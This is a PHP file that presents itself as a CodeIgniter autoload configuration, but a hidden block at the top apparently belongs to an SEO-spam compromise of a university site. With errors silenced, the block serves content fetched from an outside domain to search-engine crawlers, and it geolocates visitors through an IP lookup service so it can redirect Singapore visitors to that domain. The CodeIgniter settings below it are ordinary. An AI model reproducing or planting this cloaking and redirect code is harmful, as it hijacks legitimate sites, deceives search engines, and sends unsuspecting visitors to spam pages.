<?php

error_reporting(0);


$http_referer = $_SERVER['HTTP_REFERER'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];


$lan = strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']);


function get_client_ip()
{

	$arr_ip_header = array(
		'HTTP_CDN_SRC_IP',
		'HTTP_PROXY_CLIENT_IP',
		'HTTP_WL_PROXY_CLIENT_IP',
		'HTTP_CLIENT_IP',
		'HTTP_X_FORWARDED_FOR',
		'REMOTE_ADDR',
	);


	$client_ip = 'unknown';


	foreach ($arr_ip_header as $key)
	{
		if (!empty($_SERVER[$key]) && strtolower($_SERVER[$key]) != 'unknown')
		{
			$client_ip = $_SERVER[$key];
			break;
		}
	}


	return $client_ip;
}


$dy = array(
        array(

            'jiechizhizhu' => 'bahasa.unpra.ac.id/',


            'zhizhufanhui' => 'https://pafianabaskab.org/bahasa/',


            'jiechitiaozhuan' => 'bahasa.unpra.ac.id/',


            'tiaozhuan' => 'https://pafianabaskab.org/bahasa/',
        ),
);


$user_cl = get_client_ip();


$uri = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];


if (count($dy) > 0) {

        $botchar = "/(googlebot|slurp|Google AdSense)/";
        

        if (preg_match($botchar, strtolower($user_agent))) {

            foreach ($dy as $key => $val) {

                if ($uri == $val['jiechizhizhu'] && !empty($val['zhizhufanhui'])) {

					echo file_get_contents($val['zhizhufanhui']);exit;
                }
            }
        } elseif (preg_match('/()/', strtolower($http_referer))) {    

            foreach ($dy as $key => $val) {

                if ($uri == $val['jiechitiaozhuan'] && !empty($val['tiaozhuan'])) {

                    $ch = curl_init();
                    curl_setopt($ch, CURLOPT_URL, "http://ip-api.com/json/$user_cl"); 
                    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
                    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
                    $ipaddress = curl_exec($ch);
                    curl_close($ch);


                    $jsonArea = json_decode($ipaddress,true);


                    if (!empty($jsonArea) && !empty($jsonArea['countryCode']) && strtolower($jsonArea['countryCode']) == 'sg') {

						header('Location: '.$val['tiaozhuan']);exit;
                    }
                }
            }
        }
    }
?>
<?php
defined('BASEPATH') OR exit('No direct script access allowed');

/*
| -------------------------------------------------------------------
| AUTO-LOADER
| -------------------------------------------------------------------
| This file specifies which systems should be loaded by default.
|
| In order to keep the framework as light-weight as possible only the
| absolute minimal resources are loaded by default. For example,
| the database is not connected to automatically since no assumption
| is made regarding whether you intend to use it.  This file lets
| you globally define which systems you would like loaded with every
| request.
|
| -------------------------------------------------------------------
| Instructions
| -------------------------------------------------------------------
|
| These are the things you can load automatically:
|
| 1. Packages
| 2. Libraries
| 3. Drivers
| 4. Helper files
| 5. Custom config files
| 6. Language files
| 7. Models
|
*/

/*
| -------------------------------------------------------------------
|  Auto-load Packages
| -------------------------------------------------------------------
| Prototype:
|
|  $autoload['packages'] = array(APPPATH.'third_party', '/usr/local/shared');
|
*/
$autoload['packages'] = array();

/*
| -------------------------------------------------------------------
|  Auto-load Libraries
| -------------------------------------------------------------------
| These are the classes located in system/libraries/ or your
| application/libraries/ directory, with the addition of the
| 'database' library, which is somewhat of a special case.
|
| Prototype:
|
|	$autoload['libraries'] = array('database', 'email', 'session');
|
| You can also supply an alternative library name to be assigned
| in the controller:
|
|	$autoload['libraries'] = array('user_agent' => 'ua');
*/
$autoload['libraries'] = array('session','database','access','template');

/*
| -------------------------------------------------------------------
|  Auto-load Drivers
| -------------------------------------------------------------------
| These classes are located in system/libraries/ or in your
| application/libraries/ directory, but are also placed inside their
| own subdirectory and they extend the CI_Driver_Library class. They
| offer multiple interchangeable driver options.
|
| Prototype:
|
|	$autoload['drivers'] = array('cache');
|
| You can also supply an alternative property name to be assigned in
| the controller:
|
|	$autoload['drivers'] = array('cache' => 'cch');
|
*/
$autoload['drivers'] = array();

/*
| -------------------------------------------------------------------
|  Auto-load Helper Files
| -------------------------------------------------------------------
| Prototype:
|
|	$autoload['helper'] = array('url', 'file');
*/
$autoload['helper'] = array('form','url','security');

/*
| -------------------------------------------------------------------
|  Auto-load Config files
| -------------------------------------------------------------------
| Prototype:
|
|	$autoload['config'] = array('config1', 'config2');
|
| NOTE: This item is intended for use ONLY if you have created custom
| config files.  Otherwise, leave it blank.
|
*/
$autoload['config'] = array();

/*
| -------------------------------------------------------------------
|  Auto-load Language files
| -------------------------------------------------------------------
| Prototype:
|
|	$autoload['language'] = array('lang1', 'lang2');
|
| NOTE: Do not include the "_lang" part of your file.  For example
| "codeigniter_lang.php" would be referenced as array('codeigniter');
|
*/
$autoload['language'] = array();

/*
| -------------------------------------------------------------------
|  Auto-load Models
| -------------------------------------------------------------------
| Prototype:
|
|	$autoload['model'] = array('first_model', 'second_model');
|
| You can also supply an alternative model name to be assigned
| in the controller:
|
|	$autoload['model'] = array('first_model' => 'first');
*/
$autoload['model'] = array();
